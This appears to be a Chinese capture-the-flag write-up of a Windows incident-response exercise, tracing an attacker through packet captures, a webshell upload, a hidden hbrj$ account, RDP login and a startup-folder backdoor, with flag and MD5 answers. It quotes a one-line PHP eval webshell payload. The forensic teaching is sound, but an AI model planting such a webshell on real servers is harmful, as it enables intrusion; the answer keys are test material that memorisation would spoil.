题目描述
A集团的应用服务器被黑客入侵,该服务器的Web应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。
0x01 任务1
提交攻击者IP地址的MD5值,提交的值无需使用flag{}
首先登录目标主机后,桌面上有wireshark文件,因为是web攻击,打开后筛选http的流量,查看所有HTTP的流量发现大多数都是192.168.192.1和192.168.192.132的通信流量,且右键追踪之后可知192.168.192.132为目标服务器的站点,所以攻击者地址为192.168.192.1
转换MD5值是 6729fb3ef240c05a7037797ba7a97fcf
0x02 任务2
攻击者最先使用了什么攻击(例:SQL注入)
通过对数据包的分析,可知一直在GET一些看起来诡异的路径
看起来就是在对目录进行扫描,所以最先使用了目录扫描攻击
0x03 任务3
网站根目录robots.txt内的内容是什么
这题很简单,去看看里面有没有搭建的网站,看到有phpstudy啥的就直接点进去看,或者直接C盘根目录搜索robots.txt
答案为:flag{hbrj6666666666666666}
0x04 任务4
攻击者通过那个路径进行的上传文件
通过筛选HTTP流,目录扫描完成后就开始上传文件,可以看到上传的路径为:/plugins/upload/uploadimg.php?fp=upimg且上传了一句话木马
0x05 任务5
提交攻击者上传的后门文件内容的MD5值
上个任务就看到了上传的一句话木马
eval($_POST['hbrj']); @
转成MD5:8a451c642e3e0d946d18ab5d1a8891c7
0x06 任务6
提交攻击者创建的后门用户的MD5值
通过net user可以看到创建的用户,但是没有发现
控制面板的用户账户其实也能看到创建的用户,同时也发现用户名加了$符号,表示隐藏用户
包括计算机管理中的本地用户和组也可以发现
所以创建的后门用户为:hbrj$
转成MD5:9f7888bd5f117f82523ee532faf16b0a
0x07 任务7
攻击者什么时间创建的后门账户[答案格式:2023/03/04/11:11:11]
也很简单,cmd直接net user hbrj$,上次设置密码时间其实就是用户创建时间
0x08 任务8
攻击者利用哪个端口进行登录了服务器
这个题看到有创建系统用户的,一般可能性最大的就是直接3389远程桌面登录
可以看下主机是否开放监听了3389端口,netstat -a,确实看到3389开放了
如果实在不确定的话直接mstsc验证一下就行了
0x09 任务9
攻击者第一次登录时间为 [答案格式:2023/03/04/11:11:11]
这个在第七个任务的时候就显示了(显示的是上次登录时间),但是就只登录了一回,真实情况下应该不只一次登录,严格来讲需要分析windows日志,筛选登录成功的事件ID 4624去看第一次的登录时间。
所以答案是:2024/05/15/11:21:05
0x10 任务10
攻击者隐藏的后门文件的名称 [答案格式:xxx.exe]
这题如果是没有免杀的后门,直接杀毒软件就能查到,有免杀的话,就看看有没有在运行的可疑的进程,如果弄了权限维持的话,可以检查一下开机启动项。注意开机启动项有挺多地方可以设置的,注册表和一些操作系统里面的用户或者操作系统启动项文件夹,比如
cmd输入shell:startup
C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup
如果不想那么麻烦的话直接开D盾扫扫,在新版本2.1.8.1的D盾是有启动项检查的功能,老版本没有
找到了hbrj.exe,目录在
C:ProgramDataMicrosoftWindowsStart MenuProgramsStartUp
0x11 任务11
攻击者在注册表隐藏的flag为
在做任务10其实就意外发现了flag,就是在注册表上的开机启动项的路径下
原文始发于微信公众号(暗魂攻防实验室):【CTF】暗魂CTF平台-windows应急响应-writeup